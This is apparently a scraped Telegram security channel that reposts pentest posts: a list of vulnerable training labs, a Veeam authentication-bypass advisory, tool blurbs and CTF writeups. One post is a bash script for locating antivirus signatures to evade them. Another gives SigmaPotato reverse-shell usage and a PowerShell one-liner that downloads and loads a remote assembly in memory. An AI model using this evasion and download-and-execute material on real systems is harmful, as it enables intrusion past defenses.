uz
Feedback
Fsecurity | HH

Fsecurity | HH

Kanalga Telegram’da o‘tish

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Ko'proq ko'rsatish
2 064
Obunachilar
+224 soatlar
-17 kun
-530 kun
Postlar arxiv
Repost from PurpleBear
Меня иногда просят посоветовать self-hosted лабы по различным доменам знаний деятельности пентестеров для наработки и совершенствования навыков на практике, поэтому ловите небольшую подборку: ☑️ Kubernetes Goat - Vulnerable by design Kubernetes cluster ☑️ GOAD - Game of Active Directory ☑️ DVWA - Damn Vulnerable Web Application ☑️ DVWS - Damn Vulnerable Web Sockets ☑️ DVHMA - Damn Vulnerable Hybrid Mobile App (Android) ☑️ DVIA - Damn Vulnerable iOS App ☑️ DVIA2 - Damn Vulnerable iOS App v2 ☑️ CI/CD Goat - Vulnerable CI/CD environment ☑️ DVGA - Damn Vulnerable GraphQL Application ☑️ VAmPI - Vulnerable REST API ☑️ DVSA - Damn Vulnerable Serverless Application ☑️ DVFaaS - Damn Vulnerable Functions as a Service (AWS Lambda) ☑️ AWS Goat - Damn Vulnerable AWS Infrastructure ☑️ DVCA - Damn Vulnerable Cloud Application (AWS privesc) ☑️ Azure Goat - Damn Vulnerable Azure Infrastructure ☑️ GCP Goat - Damn Vulnerable GCP Infrastructure ☑️ DVTA - Damn Vulnerable Thick Client App ☑️ DVJA - Damn Vulnerable Java (EE) Application ☑️ DVID - Damn Vulnerable IoT Device ☑️ DVAS - Damn Vulnerable Application Scanner ☑️ DVB - Damn Vulnerable Bank ☑️ DVWPS - Damn Vulnerable WordPress Site ☑️ DVNA - Damn Vulnerable NodeJS Application ☑️ DVGM - Damn Vulnerable Grade Management ☑️ Tiredful API - REST API intentionally designed broken App ☑️ DVCSharp - Damn Vulnerable C# Application (API) ☑️ DVRF - Damn Vulnerable Router Firmware ☑️ DVLLMP - Damn Vulnerable LLM Project ☑️ DVLLMA - Damn Vulnerable LLM Agent Безусловно некоторые из них уже устарели и содержат не самые актуальные баги, а с некоторыми придется повозиться чтобы установить и развернуть, но все же это хорошая отправная точка для погружения в интересующую тематику😎

Repost from s0i37_channel
Дихотомия vs сигнатуры антивируса. Крошечный скрипт в 30 строчек, что используя бинарный поиск перезаписывает разные участки программы, а за тем грузит и запускает на тестовой системе. Так иногда можно найти точное расположение палевного участка и точечно обойти AV. Все что нужно это виртуалка с подопытным антивирусом и конечно же время.
#!/bin/bash

bin="$1"
[[ $# -ge 2 ]] && o="$2" || o=0

bytes=$(wc -c $bin | cut -d ' ' -f 1)
test="/tmp/$(basename $bin)"

function test_av(){
  HOST='10.0.0.10'; CREDS='admin:password'; RUN="c:\\$(basename $1) help exit"; OUTPUT='coffee'
  { echo 'use c$'; echo "put $1"; } | smbclient.py "$CREDS@$HOST" > /dev/null
  { echo "$RUN"; echo 'exit'; } | smbexec.py -codec 866 "$CREDS@$HOST" | grep -q "$OUTPUT"
  #{ echo '{"execute": "qmp_capabilities"}'; echo '{"execute": "human-monitor-command", "arguments": {"command-line": "loadvm ready"}}' } | nc 127.0.0.1 4444 # qemu -hda av.qcow2 -qmp tcp:127.0.0.1:4444,server,nowait
  return $?
}

next=("0 $[bytes/2]" "$[bytes/2] $[bytes/2]")
n=0
while [ $n -lt ${#next[@]} ] ; do
  read offset len <<< $(echo ${next[$n]})
  [[ $n -lt $o ]] && { next+=("$[offset] $[len/2]"); next+=("$[offset+len/2] $[len/2]"); ((n++)); continue; }
  cp "$bin" "$test"
  dd if=/dev/zero of="$test" bs=1 count=$len seek=$offset conv=notrunc 2> /dev/null
  echo -ne "[*] test $bin: $offset $len (queue: $n/${#next[@]})\r"
  if test_av "$test"; then
    echo -e "\n[+] $offset $len"
    radiff2 -x "$bin" "$test" | head
  else
    next+=("$[offset] $[len/2]")
    next+=("$[offset+len/2] $[len/2]")
  fi
  ((n++))
done
Вполне может подружить не сильно страшный бинарь с не сильно страшным антивирусом.

Repost from APT
🖥 Veeam Enterprise Manager Authentication Bypass May 21st, Veeam published an advisory stating that all the versions BEFORE
🖥 Veeam Enterprise Manager Authentication Bypass May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user. , the CVSS for this vulnerability is 9.8. 🔗 Source: https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/ 🔗 PoC: https://github.com/sinsinology/CVE-2024-29849 #veeam #authentication #bypass #cve

Repost from Pentest HaT
🏃 SigmaPotato 1.2.6 Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семей
🏃 SigmaPotato 1.2.6 Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato) Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д. whoami /priv Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a Примеры: ./SigmaPotato.exe --revshell ip port
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))
Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022
💻 Home 💻 Download #potato #lpe #windows #soft #sigmapotato ✈️ // Pentest HaT 🎩

open-appsec - это механизм безопасности машинного обучения, который превентивно и автоматически предотвращает угрозы для веб-приложений и API. Это репозиторий включает основной код и логику. 🔗Ссылка: https://github.com/openappsec/openappsec

HTB Sherlock: Constellation 🔗Ссылка: https://0xdf.gitlab.io/2024/06/05/htb-sherlock-constellation.html

GoldenEye — это инструмент тестирования DoS-атак HTTP. Этот инструмент можно использовать для проверки уязвимости сайта к атакам типа «отказ в обслуживании» (DoS). Можно открыть несколько параллельных подключений к URL-адресу, чтобы проверить, может ли веб-сервер быть скомпрометирован.
Установка:
sudo apt install goldeneye
🔗Ссылка: https://www.kali.org/tools/goldeneye/

Snort - это анализатор / регистратор пакетов на базе libpcap, который можно использовать в качестве облегченной системы обнаружения сетевых вторжений. Он поддерживает ведение журнала на основе правил и может выполнять поиск / сопоставление содержимого в дополнение к обнаружению множества других атак и зондов, таких как переполнение буфера, скрытое сканирование портов, CGI-атаки, SMB-зонды и многое другое. Snort обладает возможностью оповещения в режиме реального времени, при этом оповещения отправляются в системный журнал, отдельный файл “alert” или даже на компьютер с Windows через Samba. 🔗Ссылка: https://www.kali.org/tools/snort/

Repost from TaipanByte CTF
Всем привет! 😎 Мы добавили несколько райтапов на таски Codeby.games: 🗂Архиватор #web #easy 🔐Доступ запрещен #web #medium �
Всем привет! 😎 Мы добавили несколько райтапов на таски Codeby.games: 🗂Архиватор #web #easy 🔐Доступ запрещен #web #medium 💸Базовая авторизация 2 #web #medium 🦖Мистер Дино #web #easy 🍯Ханипот #web #easy 👩‍👩‍👦Семья #crypto #easy ㊙️Руны, руны, и ещё раз руны #crypto #medium 🪆Матрешка #forensic #easy #codeby #writeup

Repost from #memekatz
Жиза..
Жиза..

Sickle - это инструмент для разработки полезной нагрузки, изначально созданный для помощи в создании шеллкода, однако его можно использовать и для создания полезной нагрузки для других типов эксплойтов (недвоичных). Хотя текущие модули в основном предназначены для сборки, этот инструмент не ограничивается шеллкодом. 🔗Ссылка: https://www.kali.org/tools/sickle-tool/

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]